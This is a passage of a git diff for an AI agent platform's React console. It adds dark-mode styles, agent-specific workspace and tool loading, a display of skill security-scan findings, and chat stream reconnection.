+ + {t("knowledge.sourceOriginFilter")} + + setSourceTypeFilter(value as KnowledgeSourceType | "all")} + options={[ + { label: t("knowledge.allTypes"), value: "all" }, + ...SOURCE_TYPE_OPTIONS, + ]} + className={styles.filterSelect} + /> +
+
+ {filteredSources.length === 0 ? ( + + ) : ( +
+ {filteredSources.map((record) => { + const originText = getSourceOriginText(record, t); + const remoteLine = formatRemoteStatus(record, t); + const isActiveCard = indexingId === record.id; + const cardSubject = (record.subject || record.name || "").trim(); + const summaryText = (record.summary || "").trim(); + const summaryKeywords = record.keywords || []; + const hideSummaryBlock = + cardSubject.length > 0 && + summaryText.length > 0 && + cardSubject === summaryText; + const indexedCountText = record.status.indexed + ? t("knowledge.indexedCount", { + documents: record.status.document_count, + chunks: record.status.chunk_count, + }) + : "-"; + return ( +
+
+
+
+ + {record.id} + + {record.type} + {originText} +
+
+ +
+ {cardSubject ? ( +
+
+ {t("knowledge.table.subject")} +
+
openDetailDrawer(record)} + onKeyDown={(event) => + handleDetailDrawerValueKeyDown(event, record) + } + className={`${styles.infoBlock} ${styles.clickableBlock}`} + title={cardSubject} + > + + {cardSubject} + +
+
+ ) : null} + + {!hideSummaryBlock ? ( +
+
+ {t("knowledge.table.source")} +
+
openDetailDrawer(record)} + onKeyDown={(event) => + handleDetailDrawerValueKeyDown(event, record) + } + className={`${styles.infoBlock} ${styles.clickableBlock}`} + title={summaryText || t("knowledge.inlineText")} + > + + {summaryText || t("knowledge.inlineText")} + +
+
+ ) : null} + + {summaryKeywords.length > 0 ? ( +
+
+ {t("knowledge.table.keywords")} +
+
+
+ {summaryKeywords.map((keyword) => ( + + {keyword} + + ))} +
+
+
+ ) : null} + + {record.location ? ( +
+
+ {t("knowledge.table.location")} +
+
openDetailDrawer(record)} + onKeyDown={(event) => + handleDetailDrawerValueKeyDown(event, record) + } + className={`${styles.infoBlock} ${styles.singleLineValue} ${styles.clickableBlock}`} + title={record.location} + > + {record.location} +
+
+ ) : null} + +
+
+ {t("knowledge.statusAndStats")} +
+
openDetailDrawer(record)} + onKeyDown={(event) => + handleDetailDrawerValueKeyDown(event, record) + } + className={`${styles.infoBlock} ${styles.clickableBlock}`} + > +
+
+ + {record.status.indexed + ? t("knowledge.indexed") + : t("knowledge.notIndexed")} + +
+ + {indexedCountText} + +
+ {remoteLine ? ( +
+ Remote + {remoteLine} +
+ ) : null} + {record.status.remote_last_error ? ( + + {t("knowledge.remoteLastError", { + error: record.status.remote_last_error, + })} + + ) : null} +
+
+
+ +
+
+ + +
+
+
+
+ ); + })} +
+ )} +
+
+ +
+ + { + setModalOpen(false); + form.resetFields(); + resetDraftState(); + }} + confirmLoading={saving} + destroyOnClose + > +
+ + + + + {t("knowledge.urlHint")} + + + )} + {selectedType === "text" && ( + + + + )} + {selectedType === "chat" && ( + <> + + + + + {t("knowledge.chatHint")} + + + )} + + + + + + +
+
+ + + + + + ) : ( + + + + + ) + } + destroyOnClose={false} + > + + + {t("knowledge.enableConfirmDescription")} + +
+ + + + + + + + + + + + + + + +
+ {enableModalNeedsBackfillChoice ? ( + + {t("knowledge.firstEnableBackfillPrompt", { + count: backfillStatus?.history_chat_count ?? 0, + })} + + ) : ( + + {t("knowledge.enableConfigInlineHint")} + + )} +
+
+ setDetailDrawerOpen(false)} + destroyOnClose + > + {selectedSource ? ( + + {selectedSource.name?.trim() ? ( +
+
{t("knowledge.table.subject")}
+
+ {selectedSource.subject || selectedSource.name} +
+
+ ) : null} + +
+
{t("knowledge.table.source")}
+
+ {selectedSourceSummaryData.summary || t("knowledge.inlineText")} +
+
+ + {selectedSourceSummaryData.keywords.length > 0 ? ( +
+
{t("knowledge.table.keywords")}
+
+
+ {selectedSourceSummaryData.keywords.map((keyword) => ( + + {keyword} + + ))} +
+
+
+ ) : null} + +
+ {selectedSourceOriginText} + {selectedSource.type} +
+ +
+
{t("knowledge.form.id")}
+
+ {selectedSource.id} +
+
+ + {selectedSource.location ? ( +
+
{t("knowledge.table.location")}
+
{selectedSource.location}
+
+ ) : null} + +
+
{t("knowledge.table.chunkStats")}
+
+ {selectedSourceIndexedCountText} +
+
+ +
+
{t("knowledge.table.status")}
+
+ + {selectedSource.status.indexed + ? t("knowledge.indexed") + : t("knowledge.notIndexed")} + +
+
+ + {selectedSourceRemoteLine ? ( +
+
Remote
+
{selectedSourceRemoteLine}
+
+ ) : null} + + {selectedSource.status.remote_last_error ? ( + + {t("knowledge.remoteLastError", { + error: selectedSource.status.remote_last_error, + })} + + ) : null} + + + +
+
{t("knowledge.documentContent")}
+ {sourceContentLoading ? ( +
+ +
+ ) : !sourceContent?.indexed ? ( + + {selectedSource.status.indexed + ? t("knowledge.documentContentEmpty") + : t("knowledge.documentContentNotIndexed")} + + ) : ( +
+ {sourceContent.documents.map((doc, idx) => ( +
+ {sourceContent.documents.length > 1 && ( + + {doc.title || doc.path} + + )} +
+ +
+
+ ))} +
+ )} +
+
+ ) : null} +
+ + + + ); +} + +export default KnowledgePage; \ No newline at end of file diff --git a/console/src/pages/Agent/MCP/index.tsx b/console/src/pages/Agent/MCP/index.tsx index 5d640535b..f1bca6032 100644 --- a/console/src/pages/Agent/MCP/index.tsx +++ b/console/src/pages/Agent/MCP/index.tsx @@ -94,7 +94,7 @@ function MCPPage() { // Format 2: { "key": { "command": "...", ... } } // Format 3: { "key": "...", "name": "...", "command": "...", ... } (direct) - let clientsToCreate: Array<{ key: string; data: any }> = []; + const clientsToCreate: Array<{ key: string; data: any }> = []; if (parsed.mcpServers) { // Format 1: nested mcpServers diff --git a/console/src/pages/Agent/MCP/useMCP.ts b/console/src/pages/Agent/MCP/useMCP.ts index fcba7f367..e8c998ea5 100644 --- a/console/src/pages/Agent/MCP/useMCP.ts +++ b/console/src/pages/Agent/MCP/useMCP.ts @@ -3,9 +3,11 @@ import { message } from "@agentscope-ai/design"; import api from "../../../api"; import type { MCPClientInfo } from "../../../api/types"; import { useTranslation } from "react-i18next"; +import { useAgentStore } from "../../../stores/agentStore"; export function useMCP() { const { t } = useTranslation(); + const { selectedAgent } = useAgentStore(); const [clients, setClients] = useState([]); const [loading, setLoading] = useState(false); @@ -24,7 +26,7 @@ export function useMCP() { useEffect(() => { loadClients(); - }, [loadClients]); + }, [loadClients, selectedAgent]); const createClient = useCallback( async ( diff --git a/console/src/pages/Agent/Skills/index.module.less b/console/src/pages/Agent/Skills/index.module.less index de08a9a9c..3aed9c4a7 100644 --- a/console/src/pages/Agent/Skills/index.module.less +++ b/console/src/pages/Agent/Skills/index.module.less @@ -326,3 +326,95 @@ min-height: 50px; } } + +/* ─── Dark mode ─────────────────────────────────────────────────────────────── */ +:global(.dark-mode) { + .description { + color: rgba(255, 255, 255, 0.35); + } + + .loadingText { + color: rgba(255, 255, 
255, 0.35); + } + + /* Import modal hints */ + .importHintTitle { + color: rgba(255, 255, 255, 0.55); + } + + .importHintList { + color: rgba(255, 255, 255, 0.35); + } + + .importUrlInput { + background: #2a2a2a; + border-color: rgba(255, 255, 255, 0.15); + color: rgba(255, 255, 255, 0.85); + + &::placeholder { + color: rgba(255, 255, 255, 0.25); + } + + &:focus { + border-color: #615ced; + } + } + + .importLoadingText { + color: rgba(255, 255, 255, 0.45); + } + + /* Skill card */ + .skillCard { + &.normal { + border-color: rgba(255, 255, 255, 0.08) !important; + box-shadow: 0 4px 12px rgba(0, 0, 0, 0.3) !important; + } + + &.hover { + border-color: #615ced !important; + box-shadow: 0 12px 32px rgba(0, 0, 0, 0.4) !important; + } + } + + .skillTitle { + color: rgba(255, 255, 255, 0.85); + } + + .statusDot.disabled { + background-color: rgba(255, 255, 255, 0.2); + } + + .statusText.disabled { + color: rgba(255, 255, 255, 0.3); + } + + /* Description info block */ + .infoBlock { + color: rgba(255, 255, 255, 0.65); + background-color: rgba(255, 255, 255, 0.05); + border-color: rgba(255, 255, 255, 0.08); + } + + /* Source / Path labels */ + .infoLabel { + color: rgba(255, 255, 255, 0.3); + } + + /* Card footer divider */ + .cardFooter { + border-top-color: rgba(255, 255, 255, 0.08); + } + + /* Toggle label */ + .toggleLabel { + color: rgba(255, 255, 255, 0.45); + } + + /* Markdown viewer */ + .markdownViewer { + border-color: rgba(255, 255, 255, 0.1); + background-color: #1f1f1f; + color: rgba(255, 255, 255, 0.85); + } +} diff --git a/console/src/pages/Agent/Skills/index.tsx b/console/src/pages/Agent/Skills/index.tsx index abd99a9f0..62cf05d36 100644 --- a/console/src/pages/Agent/Skills/index.tsx +++ b/console/src/pages/Agent/Skills/index.tsx @@ -33,6 +33,7 @@ function SkillsPage() { "https://lobehub.com/", "https://market.lobehub.com/", "https://github.com/", + "https://modelscope.cn/skills/", ]; const isSupportedSkillUrl = (url: string) => { @@ -177,6 +178,7 @@ 
function SkillsPage() {
   • https://lobehub.com/
   • https://market.lobehub.com/
   • https://github.com/
+  • https://modelscope.cn/skills/
   • {t("skills.urlExamples")}

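The hunk above adds `https://modelscope.cn/skills/` to the list of supported skill-import URL prefixes. The check itself is a plain prefix match; a minimal sketch (the name `isSupportedSkillUrl` comes from the diff, but the exact implementation in `Skills/index.tsx` may differ):

```typescript
// Supported skill-hub URL prefixes, mirroring the list in the diff above.
const SUPPORTED_SKILL_URL_PREFIXES = [
  "https://lobehub.com/",
  "https://market.lobehub.com/",
  "https://github.com/",
  "https://modelscope.cn/skills/",
];

// Returns true when the trimmed URL starts with any supported prefix.
function isSupportedSkillUrl(url: string): boolean {
  const trimmed = url.trim();
  return SUPPORTED_SKILL_URL_PREFIXES.some((prefix) =>
    trimmed.startsWith(prefix),
  );
}
```

Note that `startsWith` makes this an allowlist on exact prefixes, so adding a new hub only requires appending one entry, as the diff does.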
      @@ -188,6 +190,7 @@ function SkillsPage() {
     • https://github.com/anthropics/skills/tree/main/skills/skill-creator
+    • https://modelscope.cn/skills/@anthropics/skill-creator
    diff --git a/console/src/pages/Agent/Skills/useSkills.ts b/console/src/pages/Agent/Skills/useSkills.ts index 28545f236..1f57749ba 100644 --- a/console/src/pages/Agent/Skills/useSkills.ts +++ b/console/src/pages/Agent/Skills/useSkills.ts @@ -1,13 +1,190 @@ -import { useState, useEffect } from "react"; +import { useState, useEffect, useCallback } from "react"; import { message, Modal } from "@agentscope-ai/design"; +import React from "react"; import api from "../../../api"; import type { SkillSpec } from "../../../api/types"; +import type { SecurityScanErrorResponse } from "../../../api/modules/security"; +import { useTranslation } from "react-i18next"; +import { useAgentStore } from "../../../stores/agentStore"; + +function tryParseScanError(error: unknown): SecurityScanErrorResponse | null { + if (!(error instanceof Error)) return null; + const msg = error.message || ""; + const jsonStart = msg.indexOf("{"); + if (jsonStart === -1) return null; + try { + const parsed = JSON.parse(msg.substring(jsonStart)); + if (parsed?.type === "security_scan_failed") { + return parsed as SecurityScanErrorResponse; + } + } catch { + // not JSON + } + return null; +} export function useSkills() { + const { t } = useTranslation(); + const { selectedAgent } = useAgentStore(); const [skills, setSkills] = useState([]); const [loading, setLoading] = useState(false); const [importing, setImporting] = useState(false); + const showScanErrorModal = useCallback( + (scanError: SecurityScanErrorResponse) => { + const findings = scanError.findings || []; + Modal.error({ + title: t("security.skillScanner.scanError.title"), + width: 640, + content: React.createElement( + "div", + null, + React.createElement( + "p", + null, + t("security.skillScanner.scanError.description"), + ), + React.createElement( + "div", + { + style: { + maxHeight: 300, + overflow: "auto", + marginTop: 8, + }, + }, + findings.map((f, i) => + React.createElement( + "div", + { + key: i, + style: { + padding: "8px 12px", + 
marginBottom: 4, + background: "#fafafa", + borderRadius: 6, + border: "1px solid #f0f0f0", + }, + }, + React.createElement( + "strong", + { style: { marginBottom: 4, display: "block" } }, + f.title, + ), + React.createElement( + "div", + { style: { fontSize: 12, color: "#666" } }, + f.file_path + (f.line_number ? `:${f.line_number}` : ""), + ), + f.description && + React.createElement( + "div", + { + style: { + fontSize: 12, + color: "#999", + marginTop: 2, + }, + }, + f.description, + ), + ), + ), + ), + ), + }); + }, + [t], + ); + + const handleError = useCallback( + (error: unknown, defaultMsg: string): boolean => { + const scanError = tryParseScanError(error); + if (scanError) { + showScanErrorModal(scanError); + return true; + } + console.error(defaultMsg, error); + message.error(defaultMsg); + return false; + }, + [showScanErrorModal], + ); + + const checkScanWarnings = useCallback( + async (skillName: string) => { + try { + const [alerts, scannerCfg] = await Promise.all([ + api.getBlockedHistory(), + api.getSkillScanner(), + ]); + if (!alerts.length) return; + if ( + scannerCfg?.whitelist?.some( + (w: { skill_name: string }) => w.skill_name === skillName, + ) + ) + return; + const latestForSkill = alerts + .filter((a) => a.skill_name === skillName && a.action === "warned") + .pop(); + if (!latestForSkill) return; + const findings = latestForSkill.findings || []; + Modal.warning({ + title: t("security.skillScanner.scanError.title"), + width: 640, + content: React.createElement( + "div", + null, + React.createElement( + "p", + null, + t("security.skillScanner.scanError.warnDescription"), + ), + React.createElement( + "div", + { style: { maxHeight: 300, overflow: "auto", marginTop: 8 } }, + findings.map((f, i) => + React.createElement( + "div", + { + key: i, + style: { + padding: "8px 12px", + marginBottom: 4, + background: "#fafafa", + borderRadius: 6, + border: "1px solid #f0f0f0", + }, + }, + React.createElement( + "strong", + { style: { marginBottom: 4, 
display: "block" } }, + f.title, + ), + React.createElement( + "div", + { style: { fontSize: 12, color: "#666" } }, + f.file_path + (f.line_number ? `:${f.line_number}` : ""), + ), + f.description && + React.createElement( + "div", + { style: { fontSize: 12, color: "#999", marginTop: 2 } }, + f.description, + ), + ), + ), + ), + ), + }); + } catch { + // non-critical + } + }, + [t], + ); + const fetchSkills = async () => { setLoading(true); try { @@ -37,17 +214,17 @@ export function useSkills() { return () => { mounted = false; }; - }, []); + }, [selectedAgent]); const createSkill = async (name: string, content: string) => { try { await api.createSkill(name, content); message.success("Created successfully"); await fetchSkills(); + await checkScanWarnings(name); return true; } catch (error) { - console.error("Failed to save skill", error); - message.error("Failed to save"); + handleError(error, "Failed to save"); return false; } }; @@ -71,13 +248,13 @@ export function useSkills() { if (result?.installed) { message.success(`Imported skill: ${result.name}`); await fetchSkills(); + if (result.name) await checkScanWarnings(result.name); return true; } message.error("Import failed"); return false; } catch (error) { - console.error("Failed to import skill from hub", error); - message.error("Import failed"); + handleError(error, "Import failed"); return false; } finally { setImporting(false); @@ -102,11 +279,11 @@ export function useSkills() { ), ); message.success("Enabled successfully"); + await checkScanWarnings(skill.name); } return true; } catch (error) { - console.error("Failed to toggle skill", error); - message.error("Operation failed"); + handleError(error, "Operation failed"); return false; } }; diff --git a/console/src/pages/Agent/Tools/useTools.ts b/console/src/pages/Agent/Tools/useTools.ts index 4fce6c20b..0938e6deb 100644 --- a/console/src/pages/Agent/Tools/useTools.ts +++ b/console/src/pages/Agent/Tools/useTools.ts @@ -3,9 +3,11 @@ import { message } from 
"@agentscope-ai/design"; import api from "../../../api"; import type { ToolInfo } from "../../../api/modules/tools"; import { useTranslation } from "react-i18next"; +import { useAgentStore } from "../../../stores/agentStore"; export function useTools() { const { t } = useTranslation(); + const { selectedAgent } = useAgentStore(); const [tools, setTools] = useState([]); const [loading, setLoading] = useState(false); const [batchLoading, setBatchLoading] = useState(false); @@ -25,21 +27,37 @@ export function useTools() { useEffect(() => { loadTools(); - }, [loadTools]); + }, [loadTools, selectedAgent]); const toggleEnabled = useCallback( async (tool: ToolInfo) => { + // Optimistic update + setTools((prev) => + prev.map((t) => + t.name === tool.name ? { ...t, enabled: !t.enabled } : t, + ), + ); + try { - await api.toggleTool(tool.name); + const result = await api.toggleTool(tool.name); message.success( tool.enabled ? t("tools.disableSuccess") : t("tools.enableSuccess"), ); - await loadTools(); - } catch { + // Update with server response (no full reload) + setTools((prev) => + prev.map((t) => (t.name === result.name ? result : t)), + ); + } catch (error) { + // Revert optimistic update on error + setTools((prev) => + prev.map((t) => + t.name === tool.name ? 
{ ...t, enabled: tool.enabled } : t, + ), + ); message.error(t("tools.toggleError")); } }, - [t, loadTools], + [t], ); const enableAll = useCallback(async () => { @@ -49,13 +67,26 @@ export function useTools() { return; } + // Optimistic update + setTools((prev) => prev.map((t) => ({ ...t, enabled: true }))); + setBatchLoading(true); try { - await Promise.all(disabledTools.map((tool) => api.toggleTool(tool.name))); + const results = await Promise.all( + disabledTools.map((tool) => api.toggleTool(tool.name)), + ); message.success(t("tools.enableAllSuccess")); - await loadTools(); - } catch { + // Update with server responses + setTools((prev) => + prev.map((t) => { + const result = results.find((r) => r.name === t.name); + return result || t; + }), + ); + } catch (error) { message.error(t("tools.toggleError")); + // Reload on error to sync with server + await loadTools(); } finally { setBatchLoading(false); } @@ -68,13 +99,26 @@ export function useTools() { return; } + // Optimistic update + setTools((prev) => prev.map((t) => ({ ...t, enabled: false }))); + setBatchLoading(true); try { - await Promise.all(enabledTools.map((tool) => api.toggleTool(tool.name))); + const results = await Promise.all( + enabledTools.map((tool) => api.toggleTool(tool.name)), + ); message.success(t("tools.disableAllSuccess")); - await loadTools(); - } catch { + // Update with server responses + setTools((prev) => + prev.map((t) => { + const result = results.find((r) => r.name === t.name); + return result || t; + }), + ); + } catch (error) { message.error(t("tools.toggleError")); + // Reload on error to sync with server + await loadTools(); } finally { setBatchLoading(false); } diff --git a/console/src/pages/Agent/Workspace/components/useAgentsData.ts b/console/src/pages/Agent/Workspace/components/useAgentsData.ts index f6965f273..4fd75af95 100644 --- a/console/src/pages/Agent/Workspace/components/useAgentsData.ts +++ b/console/src/pages/Agent/Workspace/components/useAgentsData.ts @@ -4,9 
+4,12 @@ import { useTranslation } from "react-i18next"; import api from "../../../../api"; import type { MarkdownFile, DailyMemoryFile } from "../../../../api/types"; import { workspaceApi } from "../../../../api/modules/workspace"; +import { agentsApi } from "../../../../api/modules/agents"; +import { useAgentStore } from "../../../../stores/agentStore"; export const useAgentsData = () => { const { t } = useTranslation(); + const { selectedAgent } = useAgentStore(); const [files, setFiles] = useState([]); const [selectedFile, setSelectedFile] = useState(null); const [dailyMemories, setDailyMemories] = useState([]); @@ -19,12 +22,51 @@ export const useAgentsData = () => { useEffect(() => { const initializeData = async () => { + // Remember currently selected file name + const previouslySelectedFilename = selectedFile?.filename; + + // Clear content first + setFileContent(""); + setOriginalContent(""); + setExpandedMemory(false); + const enabled = await fetchEnabledFiles(); - await fetchFiles(enabled); + const fileList = await agentsApi.listAgentFiles(selectedAgent); + const sortedFiles = sortFilesByEnabled( + fileList as unknown as MarkdownFile[], + enabled, + ); + setFiles(sortedFiles); + + // Set workspace path + if (fileList.length > 0) { + const path = fileList[0].path; + const workspace = path.substring( + 0, + path.lastIndexOf("/") || path.lastIndexOf("\\"), + ); + setWorkspacePath(workspace); + } + + // Try to re-select the same file in new workspace + if (previouslySelectedFilename) { + const sameFile = sortedFiles.find( + (f) => f.filename === previouslySelectedFilename, + ); + if (sameFile) { + // Auto-load the same file from new workspace + await handleFileClick(sameFile); + } else { + // File doesn't exist in new workspace, clear selection + setSelectedFile(null); + } + } else { + setSelectedFile(null); + } }; initializeData(); // eslint-disable-next-line react-hooks/exhaustive-deps - }, []); + }, [selectedAgent]); // Re-sort when enabledFiles changes 
(for toggle/reorder operations) useEffect(() => { @@ -82,9 +124,10 @@ export const useAgentsData = () => { const enabled = Array.isArray(latestEnabledFiles) ? latestEnabledFiles : await fetchEnabledFiles(); - const fileList = await api.listFiles(); + // Use agent-specific API + const fileList = await agentsApi.listAgentFiles(selectedAgent); const sortedFiles = sortFilesByEnabled( - fileList as MarkdownFile[], + fileList as unknown as MarkdownFile[], enabled, ); setFiles(sortedFiles); @@ -126,7 +169,8 @@ export const useAgentsData = () => { setSelectedFile(file); setLoading(true); try { - const data = await api.loadFile(file.filename); + // Use agent-specific API + const data = await agentsApi.readAgentFile(selectedAgent, file.filename); setFileContent(data.content); setOriginalContent(data.content); } catch (error) { diff --git a/console/src/pages/Agent/Workspace/index.module.less b/console/src/pages/Agent/Workspace/index.module.less index e6ecac52d..631e13d8d 100644 --- a/console/src/pages/Agent/Workspace/index.module.less +++ b/console/src/pages/Agent/Workspace/index.module.less @@ -404,3 +404,131 @@ text-align: right; flex-shrink: 0; } + +/* ─── Dark mode ─────────────────────────────────────────────────────────────── */ +:global(.dark-mode) { + .description { + color: rgba(255, 255, 255, 0.35); + } + + .workspacePath { + color: rgba(255, 255, 255, 0.3); + } + + .infoText { + color: rgba(255, 255, 255, 0.3); + } + + .divider { + background-color: rgba(255, 255, 255, 0.08); + } + + /* File list items */ + .fileItem { + background-color: #2a2a2a; + border-color: rgba(255, 255, 255, 0.1); + + &:hover:not(.selected) { + border-color: rgba(255, 255, 255, 0.2); + background-color: #333; + } + + &.selected { + border-color: #615ced; + background-color: rgba(97, 92, 237, 0.15); + } + } + + .fileItemName { + color: rgba(255, 255, 255, 0.85); + } + + .fileItemMeta { + color: rgba(255, 255, 255, 0.35); + } + + .expandIcon { + color: rgba(255, 255, 255, 0.3); + } + + 
.dragHandle { + color: rgba(255, 255, 255, 0.2); + + &:hover { + color: #8b87f0; + } + } + + .dragging { + box-shadow: 0 4px 12px rgba(0, 0, 0, 0.4); + border-color: #615ced !important; + background-color: rgba(97, 92, 237, 0.15) !important; + } + + /* Daily memory items */ + .dailyMemoryItem { + background-color: #2a2a2a; + border-color: rgba(255, 255, 255, 0.1); + + &:hover:not(.selected) { + border-color: rgba(255, 255, 255, 0.2); + background-color: #333; + } + + &.selected { + border-color: #615ced; + background-color: rgba(97, 92, 237, 0.15); + } + } + + .dailyMemoryName { + color: rgba(255, 255, 255, 0.85); + } + + .dailyMemoryMeta { + color: rgba(255, 255, 255, 0.35); + } + + /* Editor area */ + .editorHeader { + border-bottom-color: rgba(255, 255, 255, 0.08); + } + + .fileName { + color: rgba(255, 255, 255, 0.85); + } + + .filePath { + color: rgba(255, 255, 255, 0.35); + } + + .markdownViewer { + border-color: rgba(255, 255, 255, 0.1); + color: rgba(255, 255, 255, 0.85); + background: #1f1f1f; + } + + .toggleLabel { + color: rgba(255, 255, 255, 0.45); + } + + .emptyState { + color: rgba(255, 255, 255, 0.3); + } + + .sectionTitle { + color: rgba(255, 255, 255, 0.85); + } + + .attribution { + color: rgba(255, 255, 255, 0.2); + } + + /* Textarea inside editor */ + .textarea, + .editorContent textarea { + background: #2a2a2a !important; + color: rgba(255, 255, 255, 0.85) !important; + border-color: rgba(255, 255, 255, 0.1) !important; + } +} diff --git a/console/src/pages/Chat/ModelSelector/index.module.less b/console/src/pages/Chat/ModelSelector/index.module.less index e720bbfa3..302b6f0e6 100644 --- a/console/src/pages/Chat/ModelSelector/index.module.less +++ b/console/src/pages/Chat/ModelSelector/index.module.less @@ -174,3 +174,71 @@ padding: 14px 16px; text-align: center; } + +/* ─── Dark mode overrides ─────────────────────────────────────────────────── */ +:global(.dark-mode) { + .trigger { + color: rgba(255, 255, 255, 0.85); + + &:hover, + 
&.triggerActive { + color: #8b87f0; + box-shadow: 0 2px 8px rgba(97, 92, 237, 0.2); + } + } + + .triggerArrow { + color: rgba(255, 255, 255, 0.3); + + &.triggerArrowOpen { + color: #8b87f0; + } + } + + .panel { + background: #1f1f1f; + border-color: rgba(255, 255, 255, 0.08); + box-shadow: 0 8px 24px rgba(0, 0, 0, 0.4); + } + + .providerItem { + color: rgba(255, 255, 255, 0.85); + + &:hover { + background: rgba(97, 92, 237, 0.15); + color: #8b87f0; + } + } + + .providerArrow { + color: rgba(255, 255, 255, 0.2); + } + + .submenu { + background: #1f1f1f; + border-color: rgba(255, 255, 255, 0.08); + box-shadow: 0 8px 24px rgba(0, 0, 0, 0.4); + } + + .modelItem { + color: rgba(255, 255, 255, 0.85); + + &:hover { + background: rgba(97, 92, 237, 0.15); + color: #8b87f0; + } + + &.modelItemActive { + background: rgba(97, 92, 237, 0.18); + color: #8b87f0; + } + } + + .checkIcon { + color: #8b87f0; + } + + .emptyTip { + color: rgba(255, 255, 255, 0.25); + } +} diff --git a/console/src/pages/Chat/index.tsx b/console/src/pages/Chat/index.tsx index b40674c0e..b0d274fa7 100644 --- a/console/src/pages/Chat/index.tsx +++ b/console/src/pages/Chat/index.tsx @@ -1,6 +1,7 @@ import { AgentScopeRuntimeWebUI, IAgentScopeRuntimeWebUIOptions, + IAgentScopeRuntimeWebUIRef, } from "@agentscope-ai/chat"; import { useCallback, useEffect, useMemo, useRef, useState } from "react"; import { Button, Modal, Result, message } from "antd"; @@ -13,7 +14,12 @@ import defaultConfig, { getDefaultConfig } from "./OptionsPanel/defaultConfig"; import Weather from "./Weather"; import { getApiToken, getApiUrl } from "../../api/config"; import { providerApi } from "../../api/modules/provider"; +import { chatApi } from "../../api/modules/chat"; +import api from "../../api"; import ModelSelector from "./ModelSelector"; +import { useTheme } from "../../contexts/ThemeContext"; +import { useAgentStore } from "../../stores/agentStore"; +import "./index.module.less"; type CopyableContent = { type?: string; @@ 
-111,11 +117,18 @@ export default function ChatPage() { const { t } = useTranslation(); const navigate = useNavigate(); const location = useLocation(); + const { isDark } = useTheme(); const chatId = useMemo(() => { const match = location.pathname.match(/^\/chat\/(.+)$/); return match?.[1]; }, [location.pathname]); const [showModelPrompt, setShowModelPrompt] = useState(false); + const { selectedAgent } = useAgentStore(); + const [refreshKey, setRefreshKey] = useState(0); + const [chatStatus, setChatStatus] = useState<"idle" | "running">("idle"); + const [, setReconnectStreaming] = useState(false); + const reconnectTriggeredForRef = useRef(null); + const prevChatIdRef = useRef(undefined); const isComposingRef = useRef(false); const isChatActiveRef = useRef(false); @@ -125,9 +138,15 @@ export default function ChatPage() { const lastSessionIdRef = useRef(null); const chatIdRef = useRef(chatId); const navigateRef = useRef(navigate); + const chatRef = useRef(null); chatIdRef.current = chatId; navigateRef.current = navigate; + useEffect(() => { + sessionApi.setChatRef(chatRef); + return () => sessionApi.setChatRef(null); + }, []); + useEffect(() => { const handleCompositionStart = () => { if (!isChatActiveRef.current) return; @@ -195,6 +214,48 @@ export default function ChatPage() { }; }, []); + // Fetch chat status when viewing a chat (for running indicator and reconnect) + useEffect(() => { + if (!chatId || chatId === "undefined" || chatId === "null") { + setChatStatus("idle"); + return; + } + const realId = sessionApi.getRealIdForSession(chatId) ?? chatId; + api.getChat(realId).then( + (res) => setChatStatus((res.status as "idle" | "running") ?? "idle"), + () => setChatStatus("idle"), + ); + }, [chatId]); + + // Trigger reconnect when session status becomes "running" so the library + // consumes the SSE stream. 
Done here (not in sessionApi.getSession) so we + // run after React has updated and the chat input ref is ready, avoiding + // a fixed timeout and race conditions. + useEffect(() => { + if (prevChatIdRef.current !== chatId) { + prevChatIdRef.current = chatId; + reconnectTriggeredForRef.current = null; + } + if (!chatId || chatStatus !== "running") return; + if (reconnectTriggeredForRef.current === chatId) return; + reconnectTriggeredForRef.current = chatId; + sessionApi.triggerReconnectSubmit(); + }, [chatId, chatStatus]); + + // Refresh chat when selectedAgent changes + const prevSelectedAgentRef = useRef(selectedAgent); + useEffect(() => { + // Only refresh if selectedAgent actually changed (not initial mount) + if ( + prevSelectedAgentRef.current !== selectedAgent && + prevSelectedAgentRef.current !== undefined + ) { + // Force re-render by updating refresh key + setRefreshKey((prev) => prev + 1); + } + prevSelectedAgentRef.current = selectedAgent; + }, [selectedAgent]); + const getSessionListWrapped = useCallback(async () => { const sessions = await sessionApi.getSessionList(); const currentChatId = chatIdRef.current; @@ -265,10 +326,76 @@ export default function ChatPage() { const customFetch = useCallback( async (data: { - input: any[]; + input?: any[]; biz_params?: any; signal?: AbortSignal; + reconnect?: boolean; + session_id?: string; + user_id?: string; + channel?: string; }): Promise => { + const headers: Record = { + "Content-Type": "application/json", + }; + const token = getApiToken(); + if (token) headers.Authorization = `Bearer ${token}`; + try { + const agentStorage = localStorage.getItem("copaw-agent-storage"); + if (agentStorage) { + const parsed = JSON.parse(agentStorage); + const selectedAgent = parsed?.state?.selectedAgent; + if (selectedAgent) { + headers["X-Agent-Id"] = selectedAgent; + } + } + } catch (error) { + console.warn("Failed to get selected agent from storage:", error); + } + + const shouldReconnect = + data.reconnect || 
data.biz_params?.reconnect === true; + const reconnectSessionId = + data.session_id ?? window.currentSessionId ?? ""; + if (shouldReconnect && reconnectSessionId) { + const res = await fetch(getApiUrl("/console/chat"), { + method: "POST", + headers, + body: JSON.stringify({ + reconnect: true, + session_id: reconnectSessionId, + user_id: data.user_id ?? window.currentUserId ?? "default", + channel: data.channel ?? window.currentChannel ?? "console", + }), + }); + if (!res.ok || !res.body) return res; + const onStreamEnd = () => { + setChatStatus("idle"); + setReconnectStreaming(false); + }; + const stream = res.body; + const transformed = new ReadableStream({ + start(controller) { + const reader = stream.getReader(); + function pump() { + reader.read().then(({ done, value }) => { + if (done) { + controller.close(); + onStreamEnd(); + return; + } + controller.enqueue(value); + return pump(); + }); + } + pump(); + }, + }); + return new Response(transformed, { + headers: res.headers, + status: res.status, + }); + } + try { const activeModels = await providerApi.getActiveModels(); if ( @@ -283,32 +410,27 @@ export default function ChatPage() { return buildModelError(); } - const { input, biz_params } = data; + const { input = [], biz_params } = data; const session = input[input.length - 1]?.session || {}; + const sessionId = window.currentSessionId || session?.session_id || ""; const requestBody = { input: input.slice(-1), - session_id: window.currentSessionId || session?.session_id || "", + session_id: sessionId, user_id: window.currentUserId || session?.user_id || "default", channel: window.currentChannel || session?.channel || "console", stream: true, ...biz_params, }; - const headers: Record = { - "Content-Type": "application/json", - }; - const token = getApiToken(); - if (token) headers.Authorization = `Bearer ${token}`; - - return fetch(defaultConfig?.api?.baseURL || getApiUrl("/agent/process"), { + return fetch(getApiUrl("/console/chat"), { method: "POST", 
